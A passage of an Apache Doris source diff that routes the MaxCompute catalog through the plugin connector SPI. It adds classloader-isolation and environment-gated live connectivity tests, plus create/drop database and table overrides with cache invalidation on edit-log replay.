+ */ +public class OdpsClassloaderIsolationTest { + + private static final String FACTORY = + "org.apache.doris.connector.maxcompute.MCConnectorClientFactory"; + + @Test + public void odpsClientConstructsUnderIsolatedChildFirstLoaderWithoutLeak() throws Exception { + URL[] classpath = classpathUrls(); + // AK/SK auth builds the client fully offline (new AliyunAccount + new Odps; no network). + Map props = new HashMap<>(); + props.put(MCConnectorProperties.ACCESS_KEY, "test-ak"); + props.put(MCConnectorProperties.SECRET_KEY, "test-sk"); + + try (IsolatedChildFirstClassLoader loaderA = new IsolatedChildFirstClassLoader(classpath); + IsolatedChildFirstClassLoader loaderB = new IsolatedChildFirstClassLoader(classpath)) { + + Object odpsA = createIsolatedClient(loaderA, props); + Object odpsB = createIsolatedClient(loaderB, props); + + Class factoryA = loaderA.loadClass(FACTORY); + Assertions.assertNotSame(MCConnectorClientFactory.class, factoryA, + "the isolated loader must define its own connector class, not reuse the app one"); + Assertions.assertNotSame(factoryA, loaderB.loadClass(FACTORY), + "two isolated plugin loaders must not share connector class identity"); + + Assertions.assertEquals("com.aliyun.odps.Odps", odpsA.getClass().getName(), + "createClient must build an ODPS client even under classloader isolation"); + Assertions.assertSame(loaderA, odpsA.getClass().getClassLoader(), + "the ODPS SDK class must be defined by the isolated loader, not leaked from the app loader"); + Assertions.assertNotSame(odpsA.getClass(), odpsB.getClass(), + "the ODPS SDK must be isolated per plugin — no shared singleton class across loaders"); + } + } + + /** Loads {@code MCConnectorClientFactory} through {@code loader} and builds an Odps reflectively. */ + private static Object createIsolatedClient(ClassLoader loader, Map props) + throws Exception { + Class factory = loader.loadClass(FACTORY); + Assertions.assertSame(loader, factory.getClassLoader(), + "sanity: the connector factory must be defined by the isolated loader"); + Method createClient = factory.getMethod("createClient", Map.class); + Object odps = createClient.invoke(null, props); + Assertions.assertNotNull(odps, "createClient must return a non-null ODPS client"); + return odps; + } + + private static URL[] classpathUrls() throws Exception { + String classpath = System.getProperty("java.class.path"); + String[] entries = classpath.split(File.pathSeparator); + List urls = new ArrayList<>(entries.length); + for (String entry : entries) { + if (!entry.isEmpty()) { + urls.add(new File(entry).toURI().toURL()); + } + } + return urls.toArray(new URL[0]); + } + + /** + * Child-first loader: defines every non-JDK class from its own URLs (delegating only JDK + * packages to the parent), mirroring — and exceeding — the plugin isolation the connector runs + * under in production. + */ + private static final class IsolatedChildFirstClassLoader extends URLClassLoader { + + IsolatedChildFirstClassLoader(URL[] urls) { + // Parent is the JDK-only loader, so connector + SDK classes fall through to this loader. + super(urls, ClassLoader.getSystemClassLoader().getParent()); + } + + @Override + protected Class loadClass(String name, boolean resolve) throws ClassNotFoundException { + synchronized (getClassLoadingLock(name)) { + Class loaded = findLoadedClass(name); + if (loaded == null) { + if (isJdkClass(name)) { + loaded = super.loadClass(name, false); + } else { + try { + loaded = findClass(name); + } catch (ClassNotFoundException notLocal) { + loaded = super.loadClass(name, false); + } + } + } + if (resolve) { + resolveClass(loaded); + } + return loaded; + } + } + + private static boolean isJdkClass(String name) { + return name.startsWith("java.") || name.startsWith("javax.") + || name.startsWith("jdk.") || name.startsWith("sun.") + || name.startsWith("com.sun.") || name.startsWith("org.w3c.") + || name.startsWith("org.xml."); + } + } +} diff --git a/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/OdpsLiveConnectivityTest.java b/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/OdpsLiveConnectivityTest.java new file mode 100644 index 00000000000000..d7a2f1233d9fb2 --- /dev/null +++ b/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/OdpsLiveConnectivityTest.java @@ -0,0 +1,66 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.maxcompute; + +import com.aliyun.odps.Odps; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Assumptions; +import org.junit.jupiter.api.Test; + +import java.util.HashMap; +import java.util.Map; + +/** + * R-004 part 2 — live ODPS connectivity smoke (credentials required; user-run). + * + *

Complements {@link OdpsClassloaderIsolationTest} (part 1, no-creds isolation correctness): this + * one confirms the client built by {@link MCConnectorClientFactory} can actually reach a real + * MaxCompute endpoint and authenticate. It is skipped unless all four environment variables + * below are set, so it is inert in CI and never commits credentials. The cutover is declared complete + * only after a maintainer reports this green.

+ * + *
+ *   MC_ENDPOINT=https://service.<region>.maxcompute.aliyun.com/api \
+ *   MC_PROJECT=<project> MC_ACCESS_KEY=<ak> MC_SECRET_KEY=<sk> \
+ *   mvn -pl :fe-connector-maxcompute test -Dtest=OdpsLiveConnectivityTest
+ * 
+ */ +public class OdpsLiveConnectivityTest { + + @Test + public void liveMetadataRoundTrip() { + String endpoint = System.getenv("MC_ENDPOINT"); + String project = System.getenv("MC_PROJECT"); + String accessKey = System.getenv("MC_ACCESS_KEY"); + String secretKey = System.getenv("MC_SECRET_KEY"); + Assumptions.assumeTrue( + endpoint != null && project != null && accessKey != null && secretKey != null, + "skipped: set MC_ENDPOINT / MC_PROJECT / MC_ACCESS_KEY / MC_SECRET_KEY to run live"); + + Map props = new HashMap<>(); + props.put(MCConnectorProperties.ACCESS_KEY, accessKey); + props.put(MCConnectorProperties.SECRET_KEY, secretKey); + + Odps odps = MCConnectorClientFactory.createClient(props); + odps.setEndpoint(endpoint); + odps.setDefaultProject(project); + + // One trivial metadata round-trip exercises endpoint + auth end to end. + Assertions.assertDoesNotThrow(() -> odps.projects().get(project).reload()); + } +} diff --git a/fe/fe-core/pom.xml b/fe/fe-core/pom.xml index a8ea60e852421a..933c0d546e1342 100644 --- a/fe/fe-core/pom.xml +++ b/fe/fe-core/pom.xml @@ -209,6 +209,13 @@ under the License. org.apache.commons commons-lang3 + + + commons-lang + commons-lang + runtime + org.apache.commons commons-math3 @@ -359,26 +366,6 @@ under the License. fe-sql-parser ${project.version} - - com.aliyun.odps - odps-sdk-core - ${maxcompute.version} - - - antlr-runtime - org.antlr - - - antlr4 - org.antlr - - - - - com.aliyun.odps - odps-sdk-table-api - ${maxcompute.version} - org.springframework.boot diff --git a/fe/fe-core/src/main/java/org/apache/doris/connector/ConnectorSessionBuilder.java b/fe/fe-core/src/main/java/org/apache/doris/connector/ConnectorSessionBuilder.java index f52bd050e57671..3906399505641e 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/connector/ConnectorSessionBuilder.java +++ b/fe/fe-core/src/main/java/org/apache/doris/connector/ConnectorSessionBuilder.java @@ -17,6 +17,7 @@ package org.apache.doris.connector; +import org.apache.doris.common.Config; import org.apache.doris.common.util.DebugUtil; import org.apache.doris.connector.api.ConnectorSession; import org.apache.doris.qe.ConnectContext; @@ -117,6 +118,12 @@ private static Map extractSessionProperties(ConnectContext ctx) // Server-level lower_case_table_names for identifier mapping props.put("lower_case_table_names", String.valueOf(GlobalVariable.lowerCaseTableNames)); + // MaxCompute write block-id cap: the connector cannot import fe-core Config, so the tunable + // Config.max_compute_write_max_block_count is surfaced through this channel (same as + // lower_case_table_names above) and read back via ConnectorSession.getSessionProperties(). + // Key must stay byte-identical to MaxComputeConnectorMetadata.MAX_COMPUTE_WRITE_MAX_BLOCK_COUNT. + props.put("max_compute_write_max_block_count", + String.valueOf(Config.max_compute_write_max_block_count)); return props; } } diff --git a/fe/fe-core/src/main/java/org/apache/doris/connector/ConnectorSessionImpl.java b/fe/fe-core/src/main/java/org/apache/doris/connector/ConnectorSessionImpl.java index 959ba988683912..b7f57a363af353 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/connector/ConnectorSessionImpl.java +++ b/fe/fe-core/src/main/java/org/apache/doris/connector/ConnectorSessionImpl.java @@ -17,11 +17,14 @@ package org.apache.doris.connector; +import org.apache.doris.catalog.Env; import org.apache.doris.connector.api.ConnectorSession; +import org.apache.doris.connector.api.handle.ConnectorTransaction; import java.util.Collections; import java.util.Map; import java.util.Objects; +import java.util.Optional; /** * Immutable implementation of {@link ConnectorSession}. @@ -38,6 +41,10 @@ public class ConnectorSessionImpl implements ConnectorSession { private final String catalogName; private final Map catalogProperties; private final Map sessionProperties; + // Otherwise-immutable session; this is bound once by the insert executor at write time + // for connectors using the SPI transaction model (e.g. maxcompute), and read back by the + // connector's planWrite via getCurrentTransaction(). volatile for cross-thread visibility. + private volatile ConnectorTransaction currentTransaction; ConnectorSessionImpl(String queryId, String user, String timeZone, String locale, long catalogId, String catalogName, Map catalogProperties, @@ -123,6 +130,21 @@ public Map getSessionProperties() { return sessionProperties; } + @Override + public long allocateTransactionId() { + return Env.getCurrentEnv().getNextId(); + } + + @Override + public void setCurrentTransaction(ConnectorTransaction txn) { + this.currentTransaction = txn; + } + + @Override + public Optional getCurrentTransaction() { + return Optional.ofNullable(currentTransaction); + } + @Override public String toString() { return "ConnectorSession{queryId='" + queryId diff --git a/fe/fe-core/src/main/java/org/apache/doris/connector/ddl/CreateTableInfoToConnectorRequestConverter.java b/fe/fe-core/src/main/java/org/apache/doris/connector/ddl/CreateTableInfoToConnectorRequestConverter.java index 1084dd24861203..c8253483ea9a90 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/connector/ddl/CreateTableInfoToConnectorRequestConverter.java +++ b/fe/fe-core/src/main/java/org/apache/doris/connector/ddl/CreateTableInfoToConnectorRequestConverter.java @@ -17,6 +17,7 @@ package org.apache.doris.connector.ddl; +import org.apache.doris.catalog.AggregateType; import org.apache.doris.catalog.PartitionType; import org.apache.doris.connector.api.ConnectorColumn; import org.apache.doris.connector.api.ConnectorType; @@ -84,12 +85,18 @@ private static List convertColumns( DataType nereidsType = d.getType(); ConnectorType type = ConnectorColumnConverter.toConnectorType( nereidsType.toCatalogDataType()); + // Mirror Column.isAggregated(): a non-null, non-NONE aggregate type means the user + // wrote an aggregate column (e.g. SUM). The connector rejects these for engines that + // cannot store them (MaxCompute); see MaxComputeConnectorMetadata.validateColumns. + boolean isAggregated = d.getAggType() != null + && d.getAggType() != AggregateType.NONE; // Default value is not exposed via a public getter on ColumnDefinition // (private Optional); pass null until the SPI gains a // typed default-value carrier. See HANDOFF open issues. out.add(new ConnectorColumn( d.getName(), type, d.getComment(), - d.isNullable(), null, d.isKey())); + d.isNullable(), null, d.isKey(), d.getAutoIncInitValue() != -1, + isAggregated)); } return out; } diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/CatalogFactory.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/CatalogFactory.java index 9b7beffcfb37d7..290fc5ca0ae767 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/CatalogFactory.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/CatalogFactory.java @@ -27,7 +27,6 @@ import org.apache.doris.datasource.doris.RemoteDorisExternalCatalog; import org.apache.doris.datasource.hive.HMSExternalCatalog; import org.apache.doris.datasource.iceberg.IcebergExternalCatalogFactory; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalCatalog; import org.apache.doris.datasource.paimon.PaimonExternalCatalogFactory; import org.apache.doris.datasource.test.TestExternalCatalog; import org.apache.doris.nereids.trees.plans.commands.CreateCatalogCommand; @@ -47,9 +46,10 @@ public class CatalogFactory { private static final Logger LOG = LogManager.getLogger(CatalogFactory.class); // Only these catalog types are routed through the SPI connector path. - // Other types (hms, iceberg, paimon, hudi, max_compute) still use + // Other types (hms, iceberg, paimon, hudi) still use // their built-in ExternalCatalog implementations until their ConnectorProviders are fully ready. - private static final Set SPI_READY_TYPES = ImmutableSet.of("jdbc", "es", "trino-connector"); + private static final Set SPI_READY_TYPES = + ImmutableSet.of("jdbc", "es", "trino-connector", "max_compute"); /** * create the catalog instance from catalog log. @@ -143,10 +143,6 @@ private static CatalogIf createCatalog(long catalogId, String name, String resou catalog = PaimonExternalCatalogFactory.createCatalog( catalogId, name, resource, props, comment); break; - case "max_compute": - catalog = new MaxComputeExternalCatalog( - catalogId, name, resource, props, comment); - break; case "lakesoul": throw new DdlException("Lakesoul catalog is no longer supported"); case "doris": diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/ConnectorColumnConverter.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/ConnectorColumnConverter.java index 68531a4bc6021e..22cbd4cf7c58a9 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/ConnectorColumnConverter.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/ConnectorColumnConverter.java @@ -20,6 +20,7 @@ import org.apache.doris.catalog.ArrayType; import org.apache.doris.catalog.Column; import org.apache.doris.catalog.MapType; +import org.apache.doris.catalog.PrimitiveType; import org.apache.doris.catalog.ScalarType; import org.apache.doris.catalog.StructField; import org.apache.doris.catalog.StructType; @@ -107,8 +108,17 @@ public static ConnectorType toConnectorType(Type dorisType) { return ConnectorType.structOf(names, types); } else if (dorisType instanceof ScalarType) { ScalarType scalar = (ScalarType) dorisType; + PrimitiveType primitiveType = scalar.getPrimitiveType(); + // CHAR/VARCHAR store their length in `len`, not `precision`; encode it + // into the ConnectorType precision field (matching convertScalarType and + // the connector type convention) so CREATE TABLE requests keep the length. + if (primitiveType == PrimitiveType.CHAR + || primitiveType == PrimitiveType.VARCHAR) { + return ConnectorType.of(primitiveType.toString(), + scalar.getLength(), 0); + } return ConnectorType.of( - scalar.getPrimitiveType().toString(), + primitiveType.toString(), scalar.getScalarPrecision(), scalar.getScalarScale()); } else { diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/ExternalCatalog.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/ExternalCatalog.java index 4529bc7e5e43f2..780699343c1ade 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/ExternalCatalog.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/ExternalCatalog.java @@ -48,7 +48,6 @@ import org.apache.doris.datasource.infoschema.ExternalInfoSchemaDatabase; import org.apache.doris.datasource.infoschema.ExternalMysqlDatabase; import org.apache.doris.datasource.lakesoul.LakeSoulExternalDatabase; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalDatabase; import org.apache.doris.datasource.metacache.MetaCache; import org.apache.doris.datasource.operations.ExternalMetadataOps; import org.apache.doris.datasource.paimon.PaimonExternalDatabase; @@ -950,8 +949,6 @@ protected ExternalDatabase buildDbForInit(String remote return new PluginDrivenExternalDatabase(this, dbId, localDbName, remoteDbName); case ICEBERG: return new IcebergExternalDatabase(this, dbId, localDbName, remoteDbName); - case MAX_COMPUTE: - return new MaxComputeExternalDatabase(this, dbId, localDbName, remoteDbName); case LAKESOUL: return new LakeSoulExternalDatabase(this, dbId, localDbName, remoteDbName); case TEST: @@ -1035,6 +1032,10 @@ public void createDb(String dbName, boolean ifNotExists, Map pro public void replayCreateDb(String dbName) { if (metadataOps != null) { metadataOps.afterCreateDb(); + } else { + // Plugin-driven catalogs have no metadataOps; invalidate the FE cache directly so + // follower FEs reflect the create on edit-log replay, matching the master path. + resetMetaCacheNames(); } } @@ -1057,6 +1058,9 @@ public void dropDb(String dbName, boolean ifExists, boolean force) throws DdlExc public void replayDropDb(String dbName) { if (metadataOps != null) { metadataOps.afterDropDb(dbName); + } else { + // Plugin-driven path (no metadataOps): drop the db from the cache on replay. + unregisterDatabase(dbName); } } @@ -1090,6 +1094,9 @@ public boolean createTable(CreateTableInfo createTableInfo) throws UserException public void replayCreateTable(String dbName, String tblName) { if (metadataOps != null) { metadataOps.afterCreateTable(dbName, tblName); + } else { + // Plugin-driven path (no metadataOps): refresh the db's table-name cache on replay. + getDbForReplay(dbName).ifPresent(db -> db.resetMetaCacheNames()); } } @@ -1145,6 +1152,9 @@ public void dropTable(String dbName, String tableName, boolean isView, boolean i public void replayDropTable(String dbName, String tblName) { if (metadataOps != null) { metadataOps.afterDropTable(dbName, tblName); + } else { + // Plugin-driven path (no metadataOps): remove the table from the cache on replay. + getDbForReplay(dbName).ifPresent(db -> db.unregisterTable(tblName)); } } diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/ExternalMetaCacheMgr.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/ExternalMetaCacheMgr.java index 007e850e54e24e..9c4b4d5e206f36 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/ExternalMetaCacheMgr.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/ExternalMetaCacheMgr.java @@ -24,7 +24,6 @@ import org.apache.doris.datasource.hive.HiveExternalMetaCache; import org.apache.doris.datasource.hudi.HudiExternalMetaCache; import org.apache.doris.datasource.iceberg.IcebergExternalMetaCache; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalMetaCache; import org.apache.doris.datasource.metacache.AbstractExternalMetaCache; import org.apache.doris.datasource.metacache.ExternalMetaCache; import org.apache.doris.datasource.metacache.ExternalMetaCacheRegistry; @@ -65,7 +64,6 @@ public class ExternalMetaCacheMgr { private static final String ENGINE_HUDI = "hudi"; private static final String ENGINE_ICEBERG = "iceberg"; private static final String ENGINE_PAIMON = "paimon"; - private static final String ENGINE_MAXCOMPUTE = "maxcompute"; private static final String ENGINE_DORIS = "doris"; /** @@ -180,11 +178,6 @@ public PaimonExternalMetaCache paimon(long catalogId) { return (PaimonExternalMetaCache) engine(ENGINE_PAIMON); } - public MaxComputeExternalMetaCache maxCompute(long catalogId) { - prepareCatalogByEngine(catalogId, ENGINE_MAXCOMPUTE); - return (MaxComputeExternalMetaCache) engine(ENGINE_MAXCOMPUTE); - } - public DorisExternalMetaCache doris(long catalogId) { prepareCatalogByEngine(catalogId, ENGINE_DORIS); return (DorisExternalMetaCache) engine(ENGINE_DORIS); @@ -307,7 +300,6 @@ private void registerBuiltinEngineCaches() { cacheRegistry.register(new HudiExternalMetaCache(commonRefreshExecutor)); cacheRegistry.register(new IcebergExternalMetaCache(commonRefreshExecutor)); cacheRegistry.register(new PaimonExternalMetaCache(commonRefreshExecutor)); - cacheRegistry.register(new MaxComputeExternalMetaCache(commonRefreshExecutor)); cacheRegistry.register(new DorisExternalMetaCache(commonRefreshExecutor)); } diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java index 3e2a0991174300..cee0a98aebea68 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java @@ -25,13 +25,18 @@ import org.apache.doris.connector.DefaultConnectorContext; import org.apache.doris.connector.DefaultConnectorValidationContext; import org.apache.doris.connector.api.Connector; +import org.apache.doris.connector.api.ConnectorMetadata; import org.apache.doris.connector.api.ConnectorSession; import org.apache.doris.connector.api.ConnectorTestResult; import org.apache.doris.connector.api.DorisConnectorException; import org.apache.doris.connector.api.ddl.ConnectorCreateTableRequest; +import org.apache.doris.connector.api.handle.ConnectorTableHandle; import org.apache.doris.connector.ddl.CreateTableInfoToConnectorRequestConverter; import org.apache.doris.datasource.property.metastore.MetastoreProperties; import org.apache.doris.nereids.trees.plans.commands.info.CreateTableInfo; +import org.apache.doris.persist.CreateDbInfo; +import org.apache.doris.persist.DropDbInfo; +import org.apache.doris.persist.DropInfo; import org.apache.doris.qe.ConnectContext; import org.apache.doris.transaction.PluginDrivenTransactionManager; @@ -42,6 +47,7 @@ import java.util.List; import java.util.Locale; import java.util.Map; +import java.util.Optional; /** * An {@link ExternalCatalog} backed by a Connector SPI plugin. @@ -248,20 +254,50 @@ public Connector getConnector() { * to the SPI's "CREATE TABLE not supported" exception, which is wrapped * here as a {@link DdlException} to match the existing caller contract.

* - *

The SPI signature is {@code void}: it does not distinguish - * "newly created" from "already existed (IF NOT EXISTS)". This override - * conservatively assumes creation happened and writes the edit log, matching - * the more common branch of the legacy path. Refining this when a connector - * actually needs the distinction is left to P5/P6/P7 connector migrations.

+ *

The SPI {@code createTable} is {@code void} and this override has no + * {@code metadataOps}, so it mirrors legacy + * {@code MaxComputeMetadataOps.createTableImpl}: when the table already exists + * and {@code IF NOT EXISTS} was given it returns {@code true} and skips the + * connector create + edit log + cache reset (so a {@code CREATE TABLE IF NOT + * EXISTS ... AS SELECT} short-circuits per the {@code Env.createTable} contract + * instead of INSERTing into the existing table); otherwise it creates the table, + * writes the edit log, resets the cache, and returns {@code false}.

*/ @Override public boolean createTable(CreateTableInfo createTableInfo) throws UserException { makeSureInitialized(); + // Resolve the local db name to its remote (ODPS) name before handing it to the connector, + // mirroring legacy MaxComputeMetadataOps.createTableImpl (db.getRemoteName()). Without this, + // name-mapped catalogs (lower_case_meta_names / meta_names_mapping, where the local display + // name differs from the remote name) would address the wrong remote schema. The table name + // is intentionally NOT remote-resolved (legacy parity: the table does not exist yet, so + // there is no local->remote mapping for it). + ExternalDatabase db = getDbNullable(createTableInfo.getDbName()); + if (db == null) { + throw new DdlException("Failed to get database: '" + createTableInfo.getDbName() + + "' in catalog: " + getName()); + } ConnectorSession session = buildConnectorSession(); + ConnectorMetadata metadata = connector.getMetadata(session); + // Mirror legacy MaxComputeMetadataOps.createTableImpl:178-197 -- probe BOTH the remote + // (connector) and the local FE cache for an existing table. On IF NOT EXISTS this lets CTAS + // short-circuit (Env.createTable contract: return true when the table already exists), so a + // "CREATE TABLE IF NOT EXISTS ... AS SELECT" does NOT fall through to an INSERT into the + // pre-existing table. The table name is intentionally NOT remote-resolved (legacy parity). + boolean exists = metadata.getTableHandle(session, db.getRemoteName(), + createTableInfo.getTableName()).isPresent() + || db.getTableNullable(createTableInfo.getTableName()) != null; + if (exists && createTableInfo.isIfNotExists()) { + LOG.info("create table[{}.{}.{}] which already exists; skipping (IF NOT EXISTS)", + getName(), createTableInfo.getDbName(), createTableInfo.getTableName()); + return true; + } + // existing + !IF NOT EXISTS falls through to connector.createTable, which throws + // "already exists" -> DdlException (unchanged); only the IF NOT EXISTS hit short-circuits. ConnectorCreateTableRequest request = CreateTableInfoToConnectorRequestConverter - .convert(createTableInfo, createTableInfo.getDbName()); + .convert(createTableInfo, db.getRemoteName()); try { - connector.getMetadata(session).createTable(session, request); + metadata.createTable(session, request); } catch (DorisConnectorException e) { throw new DdlException(e.getMessage(), e); } @@ -271,11 +307,146 @@ public boolean createTable(CreateTableInfo createTableInfo) throws UserException createTableInfo.getDbName(), createTableInfo.getTableName()); Env.getCurrentEnv().getEditLog().logCreateTable(persistInfo); + // Invalidate the FE-side table-name cache so the new table is immediately visible on + // this FE. The legacy metadataOps path did this via afterCreateTable(); since + // PluginDrivenExternalCatalog has no metadataOps, the override must do it here. + // (Edit log and cache invalidation deliberately use the LOCAL db/table names for + // follower-replay consistency; only the connector-bound name is remote-resolved.) + getDbForReplay(createTableInfo.getDbName()).ifPresent(d -> d.resetMetaCacheNames()); LOG.info("finished to create table {}.{}.{}", getName(), createTableInfo.getDbName(), createTableInfo.getTableName()); return false; } + /** + * Routes {@code CREATE DATABASE} through the SPI's + * {@code ConnectorSchemaOps.createDatabase(session, dbName, properties)}. + * + *

The SPI signature carries no {@code ifNotExists}; this override honors it + * FE-side. It short-circuits on the local FE cache, and — for connectors that + * support CREATE DATABASE ({@code supportsCreateDatabase()}) — also consults the + * remote {@code databaseExists} so {@code CREATE DATABASE IF NOT EXISTS} on a + * database that exists remotely but is not yet in this FE's cache cleanly no-ops + * instead of surfacing a remote "already exists" error (mirroring legacy + * {@code MaxComputeMetadataOps.createDbImpl}, which checked both). On success it + * writes the edit log and invalidates the cached db-name list (mirroring the + * legacy {@code metadataOps.afterCreateDb()} the plugin path no longer has).

+ */ + @Override + public void createDb(String dbName, boolean ifNotExists, Map properties) throws DdlException { + makeSureInitialized(); + // Fast path: FE-cache hit + IF NOT EXISTS => no-op (legacy createDbImpl: dorisDb != null). + if (ifNotExists && getDbNullable(dbName) != null) { + return; + } + ConnectorSession session = buildConnectorSession(); + ConnectorMetadata metadata = connector.getMetadata(session); + // FE-cache miss but the db may already exist REMOTELY (created on another FE / before this + // FE's db-name cache was populated). Legacy MaxComputeMetadataOps.createDbImpl consulted + // BOTH getDbNullable AND the remote databaseExist, and IF NOT EXISTS then no-oped. Mirror + // that remote check. Gated on supportsCreateDatabase() so connectors that cannot create + // databases (jdbc/es/trino) keep their prior behavior (fall through to createDatabase -> + // "not supported"); the && short-circuit means they never even issue the remote query. + if (ifNotExists && metadata.supportsCreateDatabase() && metadata.databaseExists(session, dbName)) { + LOG.info("create database[{}] which already exists remotely, skip", dbName); + return; + } + try { + metadata.createDatabase(session, dbName, properties); + } catch (DorisConnectorException e) { + throw new DdlException(e.getMessage(), e); + } + Env.getCurrentEnv().getEditLog().logCreateDb(new CreateDbInfo(getName(), dbName, null)); + resetMetaCacheNames(); + LOG.info("finished to create database {}.{}", getName(), dbName); + } + + /** + * Routes {@code DROP DATABASE} through the SPI's + * {@code ConnectorSchemaOps.dropDatabase(session, dbName, ifExists)}. + * + *

{@code force} is forwarded to the connector, which performs the table + * cascade (mirroring legacy {@code MaxComputeMetadataOps.dropDbImpl}; ODPS + * {@code schemas().delete()} does not auto-cascade). On success it writes the + * edit log and unregisters the database from the cache (mirroring the legacy + * {@code metadataOps.afterDropDb()}); legacy emits no per-table editlog for the + * cascaded tables, so the single {@code logDropDb} + {@code unregisterDatabase} + * below is the complete legacy db-level FE bookkeeping.

+ */ + @Override + public void dropDb(String dbName, boolean ifExists, boolean force) throws DdlException { + makeSureInitialized(); + if (getDbNullable(dbName) == null) { + if (ifExists) { + return; + } + throw new DdlException("Failed to get database: '" + dbName + "' in catalog: " + getName()); + } + ConnectorSession session = buildConnectorSession(); + try { + connector.getMetadata(session).dropDatabase(session, dbName, ifExists, force); + } catch (DorisConnectorException e) { + throw new DdlException(e.getMessage(), e); + } + Env.getCurrentEnv().getEditLog().logDropDb(new DropDbInfo(getName(), dbName)); + unregisterDatabase(dbName); + LOG.info("finished to drop database {}.{}", getName(), dbName); + } + + /** + * Routes {@code DROP TABLE} through the SPI's + * {@code ConnectorTableOps.dropTable(session, handle)}. + * + *

The SPI takes a {@link ConnectorTableHandle} and carries no {@code ifExists}; + * this override resolves the handle first (absent = table does not exist) and + * enforces {@code IF EXISTS} FE-side. On success it writes the edit log and + * unregisters the table from the cache (mirroring {@code metadataOps.afterDropTable()}).

+ */ + @Override + public void dropTable(String dbName, String tableName, boolean isView, boolean isMtmv, boolean isStream, + boolean ifExists, boolean mustTemporary, boolean force) throws DdlException { + makeSureInitialized(); + // Resolve the local db/table names to their remote (ODPS) names before handing them to the + // connector, mirroring base ExternalCatalog.dropTable -- the exact path legacy + // MaxComputeMetadataOps.dropTableImpl ran through, which used dorisTable.getRemoteDbName() / + // getRemoteName(). Without this, name-mapped catalogs would locate the wrong remote table + // (IF EXISTS silently no-ops / non-IF-EXISTS wrongly reports "not found"). Matching base: + // a missing db ALWAYS throws (even with IF EXISTS); a missing table honors IF EXISTS. + ExternalDatabase db = getDbNullable(dbName); + if (db == null) { + throw new DdlException("Failed to get database: '" + dbName + "' in catalog: " + getName()); + } + ExternalTable dorisTable = db.getTableNullable(tableName); + if (dorisTable == null) { + if (ifExists) { + return; + } + throw new DdlException("Failed to get table: '" + tableName + "' in database: " + dbName); + } + ConnectorSession session = buildConnectorSession(); + ConnectorMetadata metadata = connector.getMetadata(session); + Optional handle = metadata.getTableHandle( + session, dorisTable.getRemoteDbName(), dorisTable.getRemoteName()); + // The table is present in the FE cache but may have been dropped out-of-band on the remote + // side; preserve the existing IF EXISTS handling for that case. + if (!handle.isPresent()) { + if (ifExists) { + return; + } + throw new DdlException("Failed to get table: '" + tableName + "' in database: " + dbName); + } + try { + metadata.dropTable(session, handle.get()); + } catch (DorisConnectorException e) { + throw new DdlException(e.getMessage(), e); + } + // Edit log and cache invalidation deliberately use the LOCAL db/table names for + // follower-replay consistency; only the connector-bound names are remote-resolved. + Env.getCurrentEnv().getEditLog().logDropTable(new DropInfo(getName(), dbName, tableName)); + getDbForReplay(dbName).ifPresent(d -> d.unregisterTable(tableName)); + LOG.info("finished to drop table {}.{}.{}", getName(), dbName, tableName); + } + @Override public String fromRemoteDatabaseName(String remoteDatabaseName) { ConnectorSession session = buildConnectorSession(); @@ -344,6 +515,8 @@ public void gsonPostProcess() throws IOException { // TRINO_CONNECTOR → "trino-connector" (hyphen), not "trino_connector". // Add cases here whenever a connector's CatalogFactory key diverges from // the lowercase enum name. + // MAX_COMPUTE needs no case: the default branch yields "max_compute", which + // already matches its CatalogFactory key — do not add a redundant case. private static String legacyLogTypeToCatalogType(InitCatalogLog.Type logType) { switch (logType) { case TRINO_CONNECTOR: diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java index 4f5982dbc563ab..85facd276e1d24 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java @@ -19,29 +19,38 @@ import org.apache.doris.catalog.Column; import org.apache.doris.catalog.Env; +import org.apache.doris.catalog.PartitionItem; import org.apache.doris.catalog.TableIf.TableType; +import org.apache.doris.catalog.Type; import org.apache.doris.common.util.DebugPointUtil; import org.apache.doris.connector.api.Connector; import org.apache.doris.connector.api.ConnectorCapability; import 